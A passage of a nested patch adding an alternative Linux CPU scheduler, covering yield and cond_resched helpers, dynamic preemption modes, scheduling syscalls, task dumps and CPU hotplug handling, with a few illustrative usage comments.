++SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	int ret;
++	cpumask_var_t mask;
++
++	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
++		return -EINVAL;
++	if (len & (sizeof(unsigned long)-1))
++		return -EINVAL;
++
++	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	ret = sched_getaffinity(pid, mask);
++	if (ret == 0) {
++		unsigned int retlen = min_t(size_t, len, cpumask_size());
++
++		if (copy_to_user(user_mask_ptr, mask, retlen))
++			ret = -EFAULT;
++		else
++			ret = retlen;
++	}
++	free_cpumask_var(mask);
++
++	return ret;
++}
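++
++/*
++ * Illustrative only, not part of the patched kernel: unlike the glibc
++ * wrapper (which returns 0), the raw syscall returns the number of
++ * mask bytes copied, per the retlen logic above:
++ *
++ *	unsigned long mask[128 / sizeof(unsigned long)];	// room for 1024 CPUs
++ *	long ret = syscall(SYS_sched_getaffinity, 0, sizeof(mask), mask);
++ *	if (ret > 0)	// ret == bytes copied, a multiple of sizeof(long)
++ *		printf("first mask word: %#lx\n", mask[0]);
++ */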
++
++static void do_sched_yield(void)
++{
++	struct rq *rq;
++	struct rq_flags rf;
++
++	if (!sched_yield_type)
++		return;
++
++	rq = this_rq_lock_irq(&rf);
++
++	schedstat_inc(rq->yld_count);
++
++	if (1 == sched_yield_type) {
++		if (!rt_task(current))
++			do_sched_yield_type_1(current, rq);
++	} else if (2 == sched_yield_type) {
++		if (rq->nr_running > 1)
++			rq->skip = current;
++	}
++
++	preempt_disable();
++	raw_spin_unlock_irq(&rq->lock);
++	sched_preempt_enable_no_resched();
++
++	schedule();
++}
++
++/**
++ * sys_sched_yield - yield the current processor to other threads.
++ *
++ * This function yields the current CPU to other tasks. If there are no
++ * other threads running on this CPU then this function will return.
++ *
++ * Return: 0.
++ */
++SYSCALL_DEFINE0(sched_yield)
++{
++	do_sched_yield();
++	return 0;
++}
++
++#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
++int __sched __cond_resched(void)
++{
++	if (should_resched(0)) {
++		preempt_schedule_common();
++		return 1;
++	}
++	/*
++	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
++	 * whether the current CPU is in an RCU read-side critical section,
++	 * so the tick can report quiescent states even for CPUs looping
++	 * in kernel context.  In contrast, in non-preemptible kernels,
++	 * RCU readers leave no in-memory hints, which means that CPU-bound
++	 * processes executing in kernel context might never report an
++	 * RCU quiescent state.  Therefore, the following code causes
++	 * cond_resched() to report a quiescent state, but only when RCU
++	 * is in urgent need of one.
++	 */
++#ifndef CONFIG_PREEMPT_RCU
++	rcu_all_qs();
++#endif
++	return 0;
++}
++EXPORT_SYMBOL(__cond_resched);
++#endif
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define cond_resched_dynamic_enabled	__cond_resched
++#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(cond_resched);
++
++#define might_resched_dynamic_enabled	__cond_resched
++#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(might_resched);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
++int __sched dynamic_cond_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_cond_resched);
++
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
++int __sched dynamic_might_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_might_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_might_resched);
++#endif
++#endif
++
++/*
++ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
++ * call schedule, and on return reacquire the lock.
++ *
++ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
++ * operations here to prevent schedule() from being called twice (once via
++ * spin_unlock(), once by hand).
++ */
++int __cond_resched_lock(spinlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held(lock);
++
++	if (spin_needbreak(lock) || resched) {
++		spin_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		spin_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_lock);
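++
++/*
++ * Illustrative only, not part of the patched kernel: the usual
++ * pattern is a long-running loop under a spinlock, via the
++ * cond_resched_lock() wrapper (foo_lock and the helpers are
++ * placeholders):
++ *
++ *	spin_lock(&foo_lock);
++ *	while (more_work()) {
++ *		do_one_item();
++ *		// Drops and retakes foo_lock when a resched is due;
++ *		// returns nonzero when it did, so any state cached
++ *		// under the lock must be revalidated.
++ *		cond_resched_lock(&foo_lock);
++ *	}
++ *	spin_unlock(&foo_lock);
++ */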
++
++int __cond_resched_rwlock_read(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_read(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		read_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		read_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_read);
++
++int __cond_resched_rwlock_write(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_write(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		write_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		write_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_write);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++
++#ifdef CONFIG_GENERIC_ENTRY
++#include <linux/entry-common.h>
++#endif
++
++/*
++ * SC:cond_resched
++ * SC:might_resched
++ * SC:preempt_schedule
++ * SC:preempt_schedule_notrace
++ * SC:irqentry_exit_cond_resched
++ *
++ *
++ * NONE:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * VOLUNTARY:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- __cond_resched
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * FULL:
++ *   cond_resched               <- RET0
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- preempt_schedule
++ *   preempt_schedule_notrace   <- preempt_schedule_notrace
++ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
++ */
++
++enum {
++	preempt_dynamic_undefined = -1,
++	preempt_dynamic_none,
++	preempt_dynamic_voluntary,
++	preempt_dynamic_full,
++};
++
++int preempt_dynamic_mode = preempt_dynamic_undefined;
++
++int sched_dynamic_mode(const char *str)
++{
++	if (!strcmp(str, "none"))
++		return preempt_dynamic_none;
++
++	if (!strcmp(str, "voluntary"))
++		return preempt_dynamic_voluntary;
++
++	if (!strcmp(str, "full"))
++		return preempt_dynamic_full;
++
++	return -EINVAL;
++}
++
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
++#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
++#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
++#else
++#error "Unsupported PREEMPT_DYNAMIC mechanism"
++#endif
++
++void sched_dynamic_update(int mode)
++{
++	/*
++	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
++	 * the ZERO state, which is invalid.
++	 */
++	preempt_dynamic_enable(cond_resched);
++	preempt_dynamic_enable(might_resched);
++	preempt_dynamic_enable(preempt_schedule);
++	preempt_dynamic_enable(preempt_schedule_notrace);
++	preempt_dynamic_enable(irqentry_exit_cond_resched);
++
++	switch (mode) {
++	case preempt_dynamic_none:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: none\n");
++		break;
++
++	case preempt_dynamic_voluntary:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_enable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: voluntary\n");
++		break;
++
++	case preempt_dynamic_full:
++		preempt_dynamic_disable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_enable(preempt_schedule);
++		preempt_dynamic_enable(preempt_schedule_notrace);
++		preempt_dynamic_enable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: full\n");
++		break;
++	}
++
++	preempt_dynamic_mode = mode;
++}
++
++static int __init setup_preempt_mode(char *str)
++{
++	int mode = sched_dynamic_mode(str);
++	if (mode < 0) {
++		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
++		return 0;
++	}
++
++	sched_dynamic_update(mode);
++	return 1;
++}
++__setup("preempt=", setup_preempt_mode);
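++
++/*
++ * Illustrative only: with CONFIG_PREEMPT_DYNAMIC=y the model is
++ * selectable on the kernel command line, e.g. preempt=none,
++ * preempt=voluntary or preempt=full, matching the static-call and
++ * static-key matrix documented above.
++ */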
++
++static void __init preempt_dynamic_init(void)
++{
++	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
++		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
++			sched_dynamic_update(preempt_dynamic_none);
++		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
++			sched_dynamic_update(preempt_dynamic_voluntary);
++		} else {
++			/* Default static call setting, nothing to do */
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
++			preempt_dynamic_mode = preempt_dynamic_full;
++			pr_info("Dynamic Preempt: full\n");
++		}
++	}
++}
++
++#define PREEMPT_MODEL_ACCESSOR(mode) \
++	bool preempt_model_##mode(void)						 \
++	{									 \
++		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
++		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
++	}									 \
++	EXPORT_SYMBOL_GPL(preempt_model_##mode)
++
++PREEMPT_MODEL_ACCESSOR(none);
++PREEMPT_MODEL_ACCESSOR(voluntary);
++PREEMPT_MODEL_ACCESSOR(full);
++
++#else /* !CONFIG_PREEMPT_DYNAMIC */
++
++static inline void preempt_dynamic_init(void) { }
++
++#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
++
++/**
++ * yield - yield the current processor to other threads.
++ *
++ * Do not ever use this function, there's a 99% chance you're doing it wrong.
++ *
++ * The scheduler is at all times free to pick the calling task as the most
++ * eligible task to run, if removing the yield() call from your code breaks
++ * it, it's already broken.
++ *
++ * Typical broken usage is:
++ *
++ * while (!event)
++ * 	yield();
++ *
++ * where one assumes that yield() will let 'the other' process run that will
++ * make event true. If the current task is a SCHED_FIFO task that will never
++ * happen. Never use yield() as a progress guarantee!!
++ *
++ * If you want to use yield() to wait for something, use wait_event().
++ * If you want to use yield() to be 'nice' for others, use cond_resched().
++ * If you still want to use yield(), do not!
++ */
++void __sched yield(void)
++{
++	set_current_state(TASK_RUNNING);
++	do_sched_yield();
++}
++EXPORT_SYMBOL(yield);
++
++/**
++ * yield_to - yield the current processor to another thread in
++ * your thread group, or accelerate that thread toward the
++ * processor it's on.
++ * @p: target task
++ * @preempt: whether task preemption is allowed or not
++ *
++ * It's the caller's job to ensure that the target task struct
++ * can't go away on us before we can do any checks.
++ *
++ * In Alt schedule FW, yield_to is not supported.
++ *
++ * Return:
++ *	true (>0) if we indeed boosted the target task.
++ *	false (0) if we failed to boost the target.
++ *	-ESRCH if there's no task to yield to.
++ */
++int __sched yield_to(struct task_struct *p, bool preempt)
++{
++	return 0;
++}
++EXPORT_SYMBOL_GPL(yield_to);
++
++int io_schedule_prepare(void)
++{
++	int old_iowait = current->in_iowait;
++
++	current->in_iowait = 1;
++	blk_flush_plug(current->plug, true);
++	return old_iowait;
++}
++
++void io_schedule_finish(int token)
++{
++	current->in_iowait = token;
++}
++
++/*
++ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
++ * that process accounting knows that this is a task in IO wait state.
++ *
++ * But don't do that if it is a deliberate, throttling IO wait (this task
++ * has set its backing_dev_info: the queue against which it should throttle)
++ */
++
++long __sched io_schedule_timeout(long timeout)
++{
++	int token;
++	long ret;
++
++	token = io_schedule_prepare();
++	ret = schedule_timeout(timeout);
++	io_schedule_finish(token);
++
++	return ret;
++}
++EXPORT_SYMBOL(io_schedule_timeout);
++
++void __sched io_schedule(void)
++{
++	int token;
++
++	token = io_schedule_prepare();
++	schedule();
++	io_schedule_finish(token);
++}
++EXPORT_SYMBOL(io_schedule);
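++
++/*
++ * Illustrative only, not part of the patched kernel: a caller waiting
++ * on I/O with a bounded sleep would use the _timeout variant so the
++ * iowait accounting above stays accurate (handle_timeout() is a
++ * placeholder):
++ *
++ *	long left = io_schedule_timeout(HZ);	// sleep up to one second
++ *	if (!left)
++ *		handle_timeout();		// 0 means the timeout expired
++ */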
++
++/**
++ * sys_sched_get_priority_max - return maximum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the maximum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = MAX_RT_PRIO - 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++/**
++ * sys_sched_get_priority_min - return minimum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the minimum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
++{
++	struct task_struct *p;
++	int retval;
++
++	alt_sched_debug();
++
++	if (pid < 0)
++		return -EINVAL;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++	rcu_read_unlock();
++
++	*t = ns_to_timespec64(sched_timeslice_ns);
++	return 0;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/**
++ * sys_sched_rr_get_interval - return the default timeslice of a process.
++ * @pid: pid of the process.
++ * @interval: userspace pointer to the timeslice value.
++ *
++ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
++ * an error code.
++ */
++SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
++		struct __kernel_timespec __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_timespec64(&t, interval);
++
++	return retval;
++}
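++
++/*
++ * Illustrative only, not part of the patched kernel: under this
++ * scheduler every eligible pid reports the same default timeslice,
++ * so the classic probe via the libc wrapper
++ *
++ *	struct timespec ts;
++ *	if (sched_rr_get_interval(0, &ts) == 0)
++ *		printf("slice: %ld.%09ld s\n", ts.tv_sec, ts.tv_nsec);
++ *
++ * simply prints sched_timeslice_ns rendered as a timespec.
++ */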
++
++#ifdef CONFIG_COMPAT_32BIT_TIME
++SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
++		struct old_timespec32 __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_old_timespec32(&t, interval);
++	return retval;
++}
++#endif
++
++void sched_show_task(struct task_struct *p)
++{
++	unsigned long free = 0;
++	int ppid;
++
++	if (!try_get_task_stack(p))
++		return;
++
++	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
++
++	if (task_is_running(p))
++		pr_cont("  running task    ");
++#ifdef CONFIG_DEBUG_STACK_USAGE
++	free = stack_not_used(p);
++#endif
++	ppid = 0;
++	rcu_read_lock();
++	if (pid_alive(p))
++		ppid = task_pid_nr(rcu_dereference(p->real_parent));
++	rcu_read_unlock();
++	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
++		free, task_pid_nr(p), ppid,
++		read_task_thread_flags(p));
++
++	print_worker_info(KERN_INFO, p);
++	print_stop_info(KERN_INFO, p);
++	show_stack(p, NULL, KERN_INFO);
++	put_task_stack(p);
++}
++EXPORT_SYMBOL_GPL(sched_show_task);
++
++static inline bool
++state_filter_match(unsigned long state_filter, struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/* no filter, everything matches */
++	if (!state_filter)
++		return true;
++
++	/* filter, but doesn't match */
++	if (!(state & state_filter))
++		return false;
++
++	/*
++	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
++	 * TASK_KILLABLE).
++	 */
++	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
++		return false;
++
++	return true;
++}
++
++
++void show_state_filter(unsigned int state_filter)
++{
++	struct task_struct *g, *p;
++
++	rcu_read_lock();
++	for_each_process_thread(g, p) {
++		/*
++		 * reset the NMI-timeout, listing all files on a slow
++		 * console might take a lot of time:
++		 * Also, reset softlockup watchdogs on all CPUs, because
++		 * another CPU might be blocked waiting for us to process
++		 * an IPI.
++		 */
++		touch_nmi_watchdog();
++		touch_all_softlockup_watchdogs();
++		if (state_filter_match(state_filter, p))
++			sched_show_task(p);
++	}
++
++#ifdef CONFIG_SCHED_DEBUG
++	/* TODO: Alt schedule FW should support this
++	if (!state_filter)
++		sysrq_sched_debug_show();
++	*/
++#endif
++	rcu_read_unlock();
++	/*
++	 * Only show locks if all tasks are dumped:
++	 */
++	if (!state_filter)
++		debug_show_all_locks();
++}
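++
++/*
++ * Illustrative only: this is the worker behind the SysRq task dumps.
++ * A hypothetical direct call would look like:
++ *
++ *	show_state_filter(0);				// all tasks, like SysRq 't'
++ *	show_state_filter(TASK_UNINTERRUPTIBLE);	// blocked tasks, like SysRq 'w'
++ */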
++
++void dump_cpu_task(int cpu)
++{
++	if (cpu == smp_processor_id() && in_hardirq()) {
++		struct pt_regs *regs;
++
++		regs = get_irq_regs();
++		if (regs) {
++			show_regs(regs);
++			return;
++		}
++	}
++
++	if (trigger_single_cpu_backtrace(cpu))
++		return;
++
++	pr_info("Task dump for CPU %d:\n", cpu);
++	sched_show_task(cpu_curr(cpu));
++}
++
++/**
++ * init_idle - set up an idle thread for a given CPU
++ * @idle: task in question
++ * @cpu: CPU the idle task belongs to
++ *
++ * NOTE: this function does not set the idle thread's NEED_RESCHED
++ * flag, to make booting more robust.
++ */
++void __init init_idle(struct task_struct *idle, int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	__sched_fork(0, idle);
++
++	raw_spin_lock_irqsave(&idle->pi_lock, flags);
++	raw_spin_lock(&rq->lock);
++
++	idle->last_ran = rq->clock_task;
++	idle->__state = TASK_RUNNING;
++	/*
++	 * PF_KTHREAD should already be set at this point; regardless, make it
++	 * look like a proper per-CPU kthread.
++	 */
++	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	kthread_set_per_cpu(idle, cpu);
++
++	sched_queue_init_idle(&rq->queue, idle);
++
++#ifdef CONFIG_SMP
++	/*
++	 * It's possible that init_idle() gets called multiple times on a task;
++	 * in that case do_set_cpus_allowed() will not do the right thing.
++	 *
++	 * And since this is boot we can forgo the serialisation.
++	 */
++	set_cpus_allowed_common(idle, cpumask_of(cpu));
++#endif
++
++	/* Silence PROVE_RCU */
++	rcu_read_lock();
++	__set_task_cpu(idle, cpu);
++	rcu_read_unlock();
++
++	rq->idle = idle;
++	rcu_assign_pointer(rq->curr, idle);
++	idle->on_cpu = 1;
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
++
++	/* Set the preempt count _outside_ the spinlocks! */
++	init_idle_preempt_count(idle, cpu);
++
++	ftrace_graph_init_idle_task(idle, cpu);
++	vtime_init_idle(idle, cpu);
++#ifdef CONFIG_SMP
++	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
++			      const struct cpumask __maybe_unused *trial)
++{
++	return 1;
++}
++
++int task_can_attach(struct task_struct *p,
++		    const struct cpumask *cs_effective_cpus)
++{
++	int ret = 0;
++
++	/*
++	 * Kthreads which disallow setaffinity shouldn't be moved
++	 * to a new cpuset; we don't want to change their CPU
++	 * affinity and isolating such threads by their set of
++	 * allowed nodes is unnecessary.  Thus, cpusets are not
++	 * applicable for such threads.  This prevents checking for
++	 * success of set_cpus_allowed_ptr() on all attached tasks
++	 * before cpus_mask may be changed.
++	 */
++	if (p->flags & PF_NO_SETAFFINITY)
++		ret = -EINVAL;
++
++	return ret;
++}
++
++bool sched_smp_initialized __read_mostly;
++
++#ifdef CONFIG_HOTPLUG_CPU
++/*
++ * Ensures that the idle task is using init_mm right before its CPU goes
++ * offline.
++ */
++void idle_task_exit(void)
++{
++	struct mm_struct *mm = current->active_mm;
++
++	BUG_ON(current != this_rq()->idle);
++
++	if (mm != &init_mm) {
++		switch_mm(mm, &init_mm, current);
++		finish_arch_post_lock_switch();
++	}
++
++	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
++}
++
++static int __balance_push_cpu_stop(void *arg)
++{
++	struct task_struct *p = arg;
++	struct rq *rq = this_rq();
++	struct rq_flags rf;
++	int cpu;
++
++	raw_spin_lock_irq(&p->pi_lock);
++	rq_lock(rq, &rf);
++
++	update_rq_clock(rq);
++
++	if (task_rq(p) == rq && task_on_rq_queued(p)) {
++		cpu = select_fallback_rq(rq->cpu, p);
++		rq = __migrate_task(rq, p, cpu);
++	}
++
++	rq_unlock(rq, &rf);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	put_task_struct(p);
++
++	return 0;
++}
++
++static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
++
++/*
++ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
++ * effective when the hotplug motion is down.
++ */
++static void balance_push(struct rq *rq)
++{
++	struct task_struct *push_task = rq->curr;
++
++	lockdep_assert_held(&rq->lock);
++
++	/*
++	 * Ensure the thing is persistent until balance_push_set(.on = false);
++	 */
++	rq->balance_callback = &balance_push_callback;
++
++	/*
++	 * Only active while going offline and when invoked on the outgoing
++	 * CPU.
++	 */
++	if (!cpu_dying(rq->cpu) || rq != this_rq())
++		return;
++
++	/*
++	 * Both the cpu-hotplug and stop task are in this case and are
++	 * required to complete the hotplug process.
++	 */
++	if (kthread_is_per_cpu(push_task) ||
++	    is_migration_disabled(push_task)) {
++
++		/*
++		 * If this is the idle task on the outgoing CPU try to wake
++		 * up the hotplug control thread which might wait for the
++		 * last task to vanish. The rcuwait_active() check is
++		 * accurate here because the waiter is pinned on this CPU
++		 * and can't obviously be running in parallel.
++		 *
++		 * On RT kernels this also has to check whether there are
++		 * pinned and scheduled out tasks on the runqueue. They
++		 * need to leave the migrate disabled section first.
++		 */
++		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
++		    rcuwait_active(&rq->hotplug_wait)) {
++			raw_spin_unlock(&rq->lock);
++			rcuwait_wake_up(&rq->hotplug_wait);
++			raw_spin_lock(&rq->lock);
++		}
++		return;
++	}
++
++	get_task_struct(push_task);
++	/*
++	 * Temporarily drop rq->lock such that we can wake-up the stop task.
++	 * Both preemption and IRQs are still disabled.
++	 */
++	raw_spin_unlock(&rq->lock);
++	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
++			    this_cpu_ptr(&push_work));
++	/*
++	 * At this point need_resched() is true and we'll take the loop in
++	 * schedule(). The next pick is obviously going to be the stop task
++	 * which kthread_is_per_cpu() and will push this task away.
++	 */
++	raw_spin_lock(&rq->lock);
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++	struct rq *rq = cpu_rq(cpu);
++	struct rq_flags rf;
++
++	rq_lock_irqsave(rq, &rf);
++	if (on) {
++		WARN_ON_ONCE(rq->balance_callback);
++		rq->balance_callback = &balance_push_callback;
++	} else if (rq->balance_callback == &balance_push_callback) {
++		rq->balance_callback = NULL;
++	}
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++/*
++ * Invoked from a CPU's hotplug control thread after the CPU has been marked
++ * inactive. All tasks which are not per CPU kernel threads are either
++ * pushed off this CPU now via balance_push() or placed on a different CPU
++ * during wakeup. Wait until the CPU is quiescent.
++ */
++static void balance_hotplug_wait(void)
++{
++	struct rq *rq = this_rq();
++
++	rcuwait_wait_event(&rq->hotplug_wait,
++			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
++			   TASK_UNINTERRUPTIBLE);
++}
++
++#else
++
++static void balance_push(struct rq *rq)
++{
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++}
++
++static inline void balance_hotplug_wait(void)
++{
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++static void set_rq_offline(struct rq *rq)
++{
++	if (rq->online)
++		rq->online = false;
++}
++
++static void set_rq_online(struct rq *rq)
++{
++	if (!rq->online)
++		rq->online = true;
++}
++
++/*
++ * used to mark begin/end of suspend/resume:
++ */
++static int num_cpus_frozen;
++
++/*
++ * Update cpusets according to cpu_active mask.  If cpusets are
++ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
++ * around partition_sched_domains().
++ *
++ * If we come here as part of a suspend/resume, don't touch cpusets because we
++ * want to restore it back to its original state upon resume anyway.
++ */
++static void cpuset_cpu_active(void)
++{
++	if (cpuhp_tasks_frozen) {
++		/*
++		 * num_cpus_frozen tracks how many CPUs are involved in suspend
++		 * resume sequence. As long as this is not the last online
++		 * operation in the resume sequence, just build a single sched
++		 * domain, ignoring cpusets.
++		 */
++		partition_sched_domains(1, NULL, NULL);
++		if (--num_cpus_frozen)
++			return;
++		/*
++		 * This is the last CPU online operation. So fall through and
++		 * restore the original sched domains by considering the
++		 * cpuset configurations.
++		 */
++		cpuset_force_rebuild();
++	}
++
++	cpuset_update_active_cpus();
++}
++
++static int cpuset_cpu_inactive(unsigned int cpu)
++{
++	if (!cpuhp_tasks_frozen) {
++		cpuset_update_active_cpus();
++	} else {
++		num_cpus_frozen++;
++		partition_sched_domains(1, NULL, NULL);
++	}
++	return 0;
++}
++
++int sched_cpu_activate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/*
++	 * Clear the balance_push callback and prepare to schedule
++	 * regular tasks.
++	 */
++	balance_push_set(cpu, false);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going up, increment the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++	set_cpu_active(cpu, true);
++
++	if (sched_smp_initialized)
++		cpuset_cpu_active();
++
++	/*
++	 * Put the rq online, if not already. This happens:
++	 *
++	 * 1) In the early boot process, because we build the real domains
++	 *    after all cpus have been brought up.
++	 *
++	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
++	 *    domains.
++	 */
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	set_rq_online(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	return 0;
++}
++
++int sched_cpu_deactivate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	int ret;
++
++	set_cpu_active(cpu, false);
++
++	/*
++	 * From this point forward, this CPU will refuse to run any task that
++	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
++	 * push those tasks away until this gets cleared, see
++	 * sched_cpu_dying().
++	 */
++	balance_push_set(cpu, true);
++
++	/*
++	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
++	 * users of this state to go away such that all new such users will
++	 * observe it.
++	 *
++	 * Specifically, we rely on ttwu to no longer target this CPU, see
++	 * ttwu_queue_cond() and is_cpu_allowed().
++	 *
++	 * Do the sync before parking smpboot threads to take care of the RCU boost case.
++	 */
++	synchronize_rcu();
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	update_rq_clock(rq);
++	set_rq_offline(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
